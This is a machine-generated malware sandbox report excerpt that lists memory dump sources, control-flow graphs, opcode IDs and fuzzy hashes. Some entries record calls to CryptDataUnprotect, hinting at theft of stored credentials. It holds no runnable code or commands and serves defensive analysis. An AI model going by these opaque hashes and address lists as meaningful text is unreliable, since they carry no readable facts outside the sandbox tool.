                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: DJ_L$IJ_H$#P
                                                                                                                        • API String ID: 0-2417076544
                                                                                                                        • Opcode ID: ab1e0a9118853b4e5da07bba8d4e409763e02acb11802f07e9c4dc93d14b85ae
                                                                                                                        • Instruction ID: 4c796deff4c2ea9d8aebfcc8663897f207645ac4ca0f340c3c5bb700da743030
                                                                                                                        • Opcode Fuzzy Hash: ab1e0a9118853b4e5da07bba8d4e409763e02acb11802f07e9c4dc93d14b85ae
                                                                                                                        • Instruction Fuzzy Hash: 0FE25D7095CB858FD7B8DB18C499BAA77E1FF98340F10466DD48EC7296DE34A842CB42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: A$;i
                                                                                                                        • API String ID: 0-3387077590
                                                                                                                        • Opcode ID: 6ac8af49919a5f90d1bf14897d60fd96a04a48c606879ce8f42ec70ea8ff65ac
                                                                                                                        • Instruction ID: f840fa3c06d75ceaac152ebceb65ae56155fbdb7c2cc1baddc4902777987227a
                                                                                                                        • Opcode Fuzzy Hash: 6ac8af49919a5f90d1bf14897d60fd96a04a48c606879ce8f42ec70ea8ff65ac
                                                                                                                        • Instruction Fuzzy Hash: 8423C47195D7C58FD3299F2884826A97FF0FF56744F1445BEC88E8B193DA386806CB82

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1866 7ff887d44010-7ff887d44051 call 7ff887d2aa40 1870 7ff887d44053-7ff887d44063 1866->1870 1871 7ff887d44065-7ff887d44070 1866->1871 1870->1871 1872 7ff887d443b3-7ff887d443b6 1871->1872 1873 7ff887d44076-7ff887d4407a 1871->1873 1876 7ff887d443b8-7ff887d443ca call 7ff887d2a810 1872->1876 1877 7ff887d443cc-7ff887d443df 1872->1877 1874 7ff887d4408b-7ff887d44093 1873->1874 1875 7ff887d4407c-7ff887d44081 1873->1875 1879 7ff887d44099-7ff887d440b6 1874->1879 1880 7ff887d44403-7ff887d44419 1874->1880 1875->1874 1876->1877 1885 7ff887d440bc-7ff887d44130 call 7ff887d2a9d8 1879->1885 1886 7ff887d44291-7ff887d4429d 1879->1886 1888 7ff887d4441b-7ff887d44422 1880->1888 1889 7ff887d44423-7ff887d44468 1880->1889 1912 7ff887d44158 1885->1912 1913 7ff887d44132-7ff887d44133 1885->1913 1891 7ff887d442d5-7ff887d442e1 1886->1891 1888->1889 1897 7ff887d4446a-7ff887d4447f 1889->1897 1898 7ff887d44482-7ff887d4448e 1889->1898 1891->1873 1894 7ff887d442e7 1891->1894 1894->1872 1897->1898 1902 7ff887d444db 1898->1902 1903 7ff887d44490-7ff887d444bb 1898->1903 1905 7ff887d444e2-7ff887d444e4 1902->1905 1910 7ff887d444c1-7ff887d444da 1903->1910 1911 7ff887d44675-7ff887d4469d 1903->1911 1908 7ff887d444ea-7ff887d44508 1905->1908 1909 7ff887d44654-7ff887d44660 1905->1909 1908->1909 1930 7ff887d4450e-7ff887d44579 1908->1930 1919 7ff887d44666-7ff887d4466f 1909->1919 1910->1905 1928 7ff887d4469f-7ff887d446dd 1911->1928 1929 7ff887d44711-7ff887d4471f 1911->1929 1918 7ff887d4415a-7ff887d44173 1912->1918 1916 7ff887d44137-7ff887d44147 1913->1916 1920 7ff887d44149-7ff887d44150 1916->1920 1921 7ff887d44156 1916->1921 1926 7ff887d44195-7ff887d44198 1918->1926 1927 7ff887d44175-7ff887d44190 call 7ff887d2aa48 1918->1927 1919->1910 1919->1911 1920->1916 1924 7ff887d44152-7ff887d44154 1920->1924 1921->1918 1924->1921 1932 7ff887d4419a-7ff887d441ad 1926->1932 1933 7ff887d44213-7ff887d4421b 1926->1933 1927->1926 1958 7ff887d446e4-7ff887d446f2 1928->1958 1968 7ff887d4457b-7ff887d445a9 1930->1968 1969 7ff887d445b6-7ff887d445f9 1930->1969 1934 7ff887d44229-7ff887d4423a call 7ff887d2aa38 1933->1934 1935 7ff887d4421d-7ff887d44227 call 7ff887d3a478 1933->1935 1947 7ff887d4426a-7ff887d44273 call 7ff887d2aa68 1934->1947 1948 7ff887d4423c-7ff887d44256 1934->1948 1935->1934 1946 7ff887d44280-7ff887d4428d 1935->1946 1946->1891 1959 7ff887d4428f-7ff887d442ff 1946->1959 1955 7ff887d44278-7ff887d4427c 1947->1955 1953 7ff887d442ec-7ff887d442f1 1948->1953 1954 7ff887d4425c-7ff887d44268 1948->1954 1953->1872 1954->1946 1955->1946 1958->1929 1961 7ff887d446f4-7ff887d4470f 1958->1961 1963 7ff887d44304-7ff887d44309 1959->1963 1961->1929 1967 7ff887d4430b-7ff887d44316 call 7ff887d2aa30 1963->1967 1972 7ff887d4431b-7ff887d4431e 1967->1972 1982 7ff887d445aa-7ff887d445af 1968->1982 1977 7ff887d4464b-7ff887d44653 call 7ff887d44720 1969->1977 1978 7ff887d445fb-7ff887d44623 1969->1978 1972->1872 1977->1909 1986 7ff887d44631-7ff887d44649 1978->1986 1987 7ff887d44625-7ff887d4462a 1978->1987 1982->1982 1984 7ff887d445b1-7ff887d445b4 1982->1984 1984->1969 1986->1977 1986->1978 1987->1986
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0#L$/B
                                                                                                                        • API String ID: 0-4077377544
                                                                                                                        • Opcode ID: 0222560456bb1768454a65013bae0a5aa652475f0fbb8721bb1a616b5a2857d8
                                                                                                                        • Instruction ID: b4304d10d436771525a635b6721fa94f1818a45180dcaf2f3c3b75eb625f9e81
                                                                                                                        • Opcode Fuzzy Hash: 0222560456bb1768454a65013bae0a5aa652475f0fbb8721bb1a616b5a2857d8
                                                                                                                        • Instruction Fuzzy Hash: 3F228030A5C9498FEBD4EB2CD459AA977F1FF99350B0402B9E44EC729ADE24E842C741

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1989 7ff887eddcb0-7ff887eddcd8 1991 7ff887eddd4d-7ff887eddd5a 1989->1991 1992 7ff887eddcda-7ff887eddcff call 7ff887edd540 call 7ff887edd550 1989->1992 1996 7ff887eddd63-7ff887edddd1 call 7ff887edaa88 1991->1996 1997 7ff887eddd5c-7ff887eddd62 1991->1997 2001 7ff887eddd04-7ff887eddd24 1992->2001 2011 7ff887edddd3-7ff887edddd8 1996->2011 2012 7ff887edddd9-7ff887edde37 call 7ff887edab00 1996->2012 2001->1991 2020 7ff887eddeac-7ff887eddeb7 2012->2020 2021 7ff887edde39-7ff887edde3b 2012->2021 2025 7ff887eddeff-7ff887eddf23 call 7ff887eda9b8 2020->2025 2026 7ff887eddeb9-7ff887eddece 2020->2026 2023 7ff887eddee6-7ff887eddefe 2021->2023 2024 7ff887edde41-7ff887edde43 2021->2024 2023->2025 2027 7ff887edde49-7ff887edde50 2024->2027 2028 7ff887eddf2a-7ff887eddf67 call 7ff887eda9b8 2024->2028 2025->2028 2036 7ff887edde94-7ff887edde98 2026->2036 2037 7ff887edded0-7ff887eddedf 2026->2037 2032 7ff887edde56-7ff887edde60 call 7ff887edd4b8 2027->2032 2033 7ff887eddf6e-7ff887eddfca call 7ff887edaaa8 2027->2033 2028->2033 2048 7ff887edde62-7ff887edde6a 2032->2048 2049 7ff887edde6b-7ff887edde6f 2032->2049 2061 7ff887eddfd3-7ff887ede040 call 7ff887edaa88 2033->2061 2062 7ff887eddfcc-7ff887eddfd2 2033->2062 2045 7ff887edde9c-7ff887eddeab 2036->2045 2037->2023 2052 7ff887edde85-7ff887edde93 2049->2052 2053 7ff887edde71-7ff887edde7d call 7ff887eda8e0 2049->2053 2052->2036 2057 7ff887edde82 2053->2057 2057->2052 2072 7ff887ede042-7ff887ede069 2061->2072 2073 7ff887ede08a-7ff887ede0aa 2061->2073 2076 7ff887ede0b4-7ff887ede0d5 2073->2076 2077 7ff887ede0ac-7ff887ede0ad 2073->2077 2081 7ff887ede0d7 2076->2081 2082 7ff887ede151-7ff887ede191 call 7ff887edd698 * 2 2076->2082 2077->2076 2083 7ff887ede0d9-7ff887ede0dd 2081->2083 2084 7ff887ede11a-7ff887ede11d 2081->2084 2097 7ff887ede1a5-7ff887ede1c7 2082->2097 2100 7ff887ede193-7ff887ede199 2082->2100 2086 7ff887ede120-7ff887ede122 2083->2086 2091 7ff887ede0df-7ff887ede0f9 2083->2091 2084->2086 2089 7ff887ede124-7ff887ede131 2086->2089 2090 7ff887ede133-7ff887ede13d call 7ff887eda8d8 2086->2090 2089->2097 2101 7ff887ede13f-7ff887ede150 2090->2101 2102 7ff887ede19b-7ff887ede1a2 2090->2102 2091->2097 2105 7ff887ede1cd-7ff887ede1d5 2097->2105 2106 7ff887ede1c9-7ff887ede1cb 2097->2106 2100->2097 2101->2082 2102->2097 2107 7ff887ede1d8-7ff887ede1dd 2105->2107 2106->2107 2108 7ff887ede1e6-7ff887ede1f2 call 7ff887edab98 2107->2108 2109 7ff887ede1df-7ff887ede1e4 2107->2109 2111 7ff887ede1f4-7ff887ede1fe 2108->2111 2109->2111 2113 7ff887ede200-7ff887ede202 2111->2113 2114 7ff887ede21e 2111->2114 2115 7ff887ede204-7ff887ede206 2113->2115 2116 7ff887ede208-7ff887ede210 2113->2116 2117 7ff887ede221-7ff887ede261 call 7ff887edacb0 2114->2117 2118 7ff887ede213-7ff887ede21c 2115->2118 2116->2118 2125 7ff887ede266-7ff887ede2bb 2117->2125 2118->2117 2133 7ff887ede2bd-7ff887ede2ca call 7ff887edd6c0 2125->2133 2134 7ff887ede2cf-7ff887ede2d4 2125->2134 2133->2134 2136 7ff887ede2e7-7ff887ede2f7 2134->2136 2137 7ff887ede2d6-7ff887ede2e2 call 7ff887edaba0 2134->2137 2137->2136
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (LL$0WL
                                                                                                                        • API String ID: 0-62861602
                                                                                                                        • Opcode ID: df1ce92f191e6340121c2d141fb7b4f6bd40bf995e7a9db46d63304a94f4dd4f
                                                                                                                        • Instruction ID: 1abb2f214269ee163aba002b75b33b42c85a65cca180c74eee88dcce85935f72
                                                                                                                        • Opcode Fuzzy Hash: df1ce92f191e6340121c2d141fb7b4f6bd40bf995e7a9db46d63304a94f4dd4f
                                                                                                                        • Instruction Fuzzy Hash: D522F221A5CA4A4FE7A9EA2C84552B97BE1FF99790F0401BED48EC72D3DD1CAC46C341

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2139 7ff887ed9db8-7ff887ed9df8 2144 7ff887ed9e42-7ff887ed9e46 2139->2144 2145 7ff887ed9dfa-7ff887ed9e16 2139->2145 2152 7ff887ed9e4d-7ff887ed9e54 2144->2152 2146 7ff887ed9e6f-7ff887ed9e7c 2145->2146 2147 7ff887ed9e18-7ff887ed9e1b 2145->2147 2150 7ff887ed9ec6-7ff887ed9ecb 2146->2150 2151 7ff887ed9e7e-7ff887ed9e99 2146->2151 2148 7ff887ed9e1d-7ff887ed9e3e call 7ff887ed9ae0 2147->2148 2149 7ff887ed9e9c-7ff887ed9ea9 2147->2149 2148->2144 2155 7ff887ed9f02-7ff887ed9f0b 2149->2155 2156 7ff887ed9eab-7ff887ed9eae 2149->2156 2159 7ff887ed9ecd-7ff887ed9eeb call 7ff887ed9ac0 2150->2159 2160 7ff887ed9f4c-7ff887ed9f4d 2150->2160 2151->2149 2152->2146 2157 7ff887ed9f55-7ff887ed9fa7 2155->2157 2158 7ff887ed9f0d-7ff887ed9f2d 2155->2158 2161 7ff887ed9eb0-7ff887ed9eb2 2156->2161 2162 7ff887ed9f2f-7ff887ed9f32 2156->2162 2177 7ff887ed9fff-7ff887eda003 2157->2177 2178 7ff887ed9fa9-7ff887ed9fb4 2157->2178 2208 7ff887ed9ef0-7ff887ed9f01 call 7ff887ed9f02 2159->2208 2164 7ff887ed9f50-7ff887ed9f53 2160->2164 2165 7ff887ed9f4f 2160->2165 2166 7ff887ed9eb4 2161->2166 2167 7ff887ed9f2e 2161->2167 2163 7ff887ed9f34-7ff887ed9f39 2162->2163 2171 7ff887ed9f3a-7ff887ed9f3b 2163->2171 2164->2157 2165->2164 2173 7ff887ed9ef6-7ff887ed9efb 2166->2173 2174 7ff887ed9eb6-7ff887ed9eb8 2166->2174 2167->2162 2175 7ff887ed9f3d 2171->2175 2176 7ff887ed9f3e 2171->2176 2180 7ff887ed9efc-7ff887ed9f01 2173->2180 2174->2163 2179 7ff887ed9eba 2174->2179 2175->2176 2186 7ff887ed9f40-7ff887ed9f4a 2176->2186 2181 7ff887eda005-7ff887eda037 2177->2181 2182 7ff887eda038-7ff887eda03c 2177->2182 2184 7ff887eda330-7ff887eda359 2178->2184 2185 7ff887ed9fba-7ff887ed9fe4 2178->2185 2179->2180 2187 7ff887ed9ebc-7ff887ed9ebe 2179->2187 2180->2155 2181->2182 2191 7ff887eda250-7ff887eda272 2182->2191 2192 7ff887eda042-7ff887eda071 2182->2192 2195 7ff887eda35b-7ff887eda36c 2184->2195 2203 7ff887ed9fee-7ff887ed9ffe 2185->2203 2186->2160 2187->2171 2188 7ff887ed9ec0 2187->2188 2188->2155 2194 7ff887ed9ec2-7ff887ed9ec4 2188->2194 2197 7ff887eda279-7ff887eda28c 2191->2197 2206 7ff887eda077-7ff887eda099 2192->2206 2207 7ff887eda2e9-7ff887eda2fb call 7ff887eda36d 2192->2207 2194->2150 2194->2186 2198 7ff887eda28e-7ff887eda297 2197->2198 2199 7ff887eda2ca-7ff887eda2e3 2197->2199 2204 7ff887eda2a9-7ff887eda2c0 2198->2204 2205 7ff887eda299-7ff887eda29f 2198->2205 2199->2206 2199->2207 2203->2177 2204->2199 2219 7ff887eda2c2-7ff887eda2c3 2204->2219 2205->2204 2216 7ff887eda09b-7ff887eda0a4 2206->2216 2217 7ff887eda10a-7ff887eda10c 2206->2217 2222 7ff887eda307-7ff887eda31a call 7ff887eda3c7 2207->2222 2223 7ff887eda2fd-7ff887eda305 call 7ff887eda36d 2207->2223 2233 7ff887eda115 2216->2233 2234 7ff887eda0a6-7ff887eda0a9 2216->2234 2220 7ff887eda11d-7ff887eda123 2217->2220 2221 7ff887eda10e-7ff887eda114 2217->2221 2219->2199 2225 7ff887eda126-7ff887eda128 2220->2225 2227 7ff887eda117-7ff887eda11b 2221->2227 2237 7ff887eda326-7ff887eda32d 2222->2237 2238 7ff887eda31c-7ff887eda324 call 7ff887eda3c7 2222->2238 2223->2238 2231 7ff887eda12a-7ff887eda20f 2225->2231 2227->2231 2231->2197 2259 7ff887eda211-7ff887eda24b call 7ff887ed9b00 2231->2259 2233->2227 2235 7ff887eda125 2234->2235 2236 7ff887eda0ab-7ff887eda103 2234->2236 2235->2225 2236->2217 2237->2184 2238->2195 2259->2223
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6B$8ML
                                                                                                                        • API String ID: 0-2325053505
                                                                                                                        • Opcode ID: 1ed0318946f66ff650226eb8b58384decd31c0d81dea47d760fe6d1c395f6df3
                                                                                                                        • Instruction ID: 46f85f58be72243d542db4efeb7d1f87249d13ec5a1648d7d30344e1e63c8163
                                                                                                                        • Opcode Fuzzy Hash: 1ed0318946f66ff650226eb8b58384decd31c0d81dea47d760fe6d1c395f6df3
                                                                                                                        • Instruction Fuzzy Hash: 6322D131A4CA4A8FEB94EF28C851AAD7BF1FF59740F144279D41DC7287DA38A846C781
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: b4B
                                                                                                                        • API String ID: 0-3849415641
                                                                                                                        • Opcode ID: 134b011ae7db8ee12c6c61a710a3243e9fd98e28d0e0d5703c718d67ebd4f915
                                                                                                                        • Instruction ID: 993908ff53c2f6e8e975ae35442fb2d21435d403cfe25d1dc6bbf927fd4bb406
                                                                                                                        • Opcode Fuzzy Hash: 134b011ae7db8ee12c6c61a710a3243e9fd98e28d0e0d5703c718d67ebd4f915
                                                                                                                        • Instruction Fuzzy Hash: B2A26370A5CB458FD7A8DB18C495BAAB7E1FFA9340F10466DD08EC7296DE34B841CB81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ^
                                                                                                                        • API String ID: 0-1590793086
                                                                                                                        • Opcode ID: b0ff574357bce8e7a2f2c53665bbef3c8e8164d26ce4d2d5c847fd68f6309994
                                                                                                                        • Instruction ID: ba72f1638013df68a2fa34314e0de23b4a3c5b048513600e1fc1b89ec3e6e146
                                                                                                                        • Opcode Fuzzy Hash: b0ff574357bce8e7a2f2c53665bbef3c8e8164d26ce4d2d5c847fd68f6309994
                                                                                                                        • Instruction Fuzzy Hash: C3621731F4DA8A4FE7599A2C98556BC7BE1FF95350B0402BED04EC7297DE28AC42C781
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: /B
                                                                                                                        • API String ID: 0-1225004542
                                                                                                                        • Opcode ID: 3083e22c90ab002879f1a8a6ddb1ab7a53a341632c789555f91d1251944014ba
                                                                                                                        • Instruction ID: c78ef091ddc3c401f389de95b5bf19ac832c16978b0e7edf51f7dc4cc5ebf878
                                                                                                                        • Opcode Fuzzy Hash: 3083e22c90ab002879f1a8a6ddb1ab7a53a341632c789555f91d1251944014ba
                                                                                                                        • Instruction Fuzzy Hash: A352D430A48A4A8FDBD4EF28C455BAA77F1FF59350F1442B9D41ECB296DA34E842C741
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8ML
                                                                                                                        • API String ID: 0-1551480261
                                                                                                                        • Opcode ID: 712be9c17e6e8bb5bd33f50cda253cdfdaf234677354a760951b1f41574c8ede
                                                                                                                        • Instruction ID: 615a5faed1642a2c5d4ba083762967bcce39053a39b82caf8eefc5b69b946baa
                                                                                                                        • Opcode Fuzzy Hash: 712be9c17e6e8bb5bd33f50cda253cdfdaf234677354a760951b1f41574c8ede
                                                                                                                        • Instruction Fuzzy Hash: B502F371E5CA4A8FE798DE28945567DB7E1FF58340B14427EE01FC329ADE28B882C740
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: /B
                                                                                                                        • API String ID: 0-1225004542
                                                                                                                        • Opcode ID: 096707bd97629af8bf03e64133e95bfdfbb3b013bf514c2397f2a3e9f5cd0367
                                                                                                                        • Instruction ID: c85c678a80ac75a5d61d6bb7e782fdafc3d906959cf48dc4c9d716cf4025eee2
                                                                                                                        • Opcode Fuzzy Hash: 096707bd97629af8bf03e64133e95bfdfbb3b013bf514c2397f2a3e9f5cd0367
                                                                                                                        • Instruction Fuzzy Hash: 0BE1C231E5894A8FE769EB2C84656BC7BE1FF58B54F0401BAD44EC7293DE28AC41C741
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CryptDataUnprotect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 834300711-0
                                                                                                                        • Opcode ID: 0994415112b3d5526a5b739fb66425bc5beb3ee4719bfc5a9e6590fa4294ae31
                                                                                                                        • Instruction ID: 4444d29f10498c8a377c0180ec9240eb4df8134651f8bb88034fff945d0d1aa9
                                                                                                                        • Opcode Fuzzy Hash: 0994415112b3d5526a5b739fb66425bc5beb3ee4719bfc5a9e6590fa4294ae31
                                                                                                                        • Instruction Fuzzy Hash: D331A13091CA089FDB18EF5CD8066B9B7E0FB99721F00422EE449D3252DB75B8568BD2
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CryptDataUnprotect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 834300711-0
                                                                                                                        • Opcode ID: de8c5953308d67f9908ab8a2f05ed4d6b9fecdfd5b283050feac5e4600598bc8
                                                                                                                        • Instruction ID: c58051faa573f1a58e43e8a9a0f03bb95fc45b3a1e94cddd4098a8bea5209bd4
                                                                                                                        • Opcode Fuzzy Hash: de8c5953308d67f9908ab8a2f05ed4d6b9fecdfd5b283050feac5e4600598bc8
                                                                                                                        • Instruction Fuzzy Hash: 3931B43191CA4C8FDB18DF5CD8066B9BBE1FB99711F00422FE449D3242DB74A8558BC2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 1G_H
                                                                                                                        • API String ID: 0-1495421860
                                                                                                                        • Opcode ID: c00e9bae6922463b138950640107fd677bc571598b3a8685401055cf3c6f5c00
                                                                                                                        • Instruction ID: 5e67e17c4c6b7149d069057fc91cb8477e187db3c83b079df3c30f0fcaa3f46a
                                                                                                                        • Opcode Fuzzy Hash: c00e9bae6922463b138950640107fd677bc571598b3a8685401055cf3c6f5c00
                                                                                                                        • Instruction Fuzzy Hash: 56B13AA2E4CB8B1FE356DA3888851B97BE0FF56694B1845BBC41EC70D7DE1C6806C391
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: da0e2e6d4d81ce1e13cb3df966f49023a48d75f8a083a89af15381560f113bd4
                                                                                                                        • Instruction ID: f9cff6228b6f06dd23c0042f81ce394b90fd1f10f29aecd31af01a856dcd5cc2
                                                                                                                        • Opcode Fuzzy Hash: da0e2e6d4d81ce1e13cb3df966f49023a48d75f8a083a89af15381560f113bd4
                                                                                                                        • Instruction Fuzzy Hash: 86525370A58A498FDB98DB18C495BA877F1FF58344F1482A9D04ED729ADE34B881CB81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 923bf46b77ed3954a3bed11bc479d02e5d39897000c30329ed46b369b5f7ef01
                                                                                                                        • Instruction ID: b77d8b2f1b3291a0693e32ad81f3c9a5d15e54cdf51b1ba175851a236f54d549
                                                                                                                        • Opcode Fuzzy Hash: 923bf46b77ed3954a3bed11bc479d02e5d39897000c30329ed46b369b5f7ef01
                                                                                                                        • Instruction Fuzzy Hash: 41121B30A5DA865BE758A62C94566BD73D2FF98380F44477ED04FC72CBDE28B806C681
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c58f2dc64b8cee1340dd542dacf21e37c30f2796b0bf8a42d3b4042054cbfc93
                                                                                                                        • Instruction ID: 72d1fd6a2a7bb96031c8de543caffaa4b490da4f65698d1d9d8b00258609e5d8
                                                                                                                        • Opcode Fuzzy Hash: c58f2dc64b8cee1340dd542dacf21e37c30f2796b0bf8a42d3b4042054cbfc93
                                                                                                                        • Instruction Fuzzy Hash: 9D22DE31A18A4A8FDB88EF6CD4556ED77B1FF99350B14457AD05AC7283DE38E842CB80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 06b32cb6c135dca9ae222ddcd6f52e0124676c8a5d6c5e912765ada9e3dc469a
                                                                                                                        • Instruction ID: 0078262b2850d1efb086a9e0febcf264dd497b2dcd3a090e898c397eea8e71e4
                                                                                                                        • Opcode Fuzzy Hash: 06b32cb6c135dca9ae222ddcd6f52e0124676c8a5d6c5e912765ada9e3dc469a
                                                                                                                        • Instruction Fuzzy Hash: 8D222272E5DA864FE798DA68941A6BC7BE1FF55B40B0444BEC00ECB2D2DD3C6846C711
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cf5404b452eb3b912cea33522e2c9b28e9c4edd28d8c1525eb52228e4848102f
                                                                                                                        • Instruction ID: 6304e923f703a3f7a53d60314bcea72a08b9a24ef94d5b02f38d0e195acce4f6
                                                                                                                        • Opcode Fuzzy Hash: cf5404b452eb3b912cea33522e2c9b28e9c4edd28d8c1525eb52228e4848102f
